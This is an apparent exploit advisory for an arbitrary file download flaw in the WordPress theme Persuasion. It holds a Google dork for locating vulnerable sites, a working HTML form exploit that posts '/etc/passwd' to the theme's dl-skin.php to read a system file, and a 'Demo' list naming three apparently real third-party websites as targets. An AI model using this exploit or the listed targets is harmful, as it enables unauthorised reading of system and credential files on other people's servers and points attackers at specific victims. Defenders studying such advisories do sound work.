facebook facebook twitter rss

Wordpress Theme Persuasion Arbitrary File Download Vulnerability

Author: CrashBandicot , Published: 08-07-2014
	

############################################################################

# Title : Wordpress Theme Persuasion Arbitrary File Download Vulnerability

# Author : CrashBandicot

# Date : 08/07/2014

# Email: ccrashbandicot@gmail.com

# Vendor : www.wordpress.org

# Google Dork : inurl:/wp-content/themes/persuasion/

# Tested on : windows

############################################################################



Exploit:

<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/persuasion/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value=Download>
</form>
</body>
</html>


Demo:
http://anchormediastudio.com/
http://sti-informatique.ca/
http://www.zevendesign.com/


Sh00tz to : All my Friends

Like us on Facebook :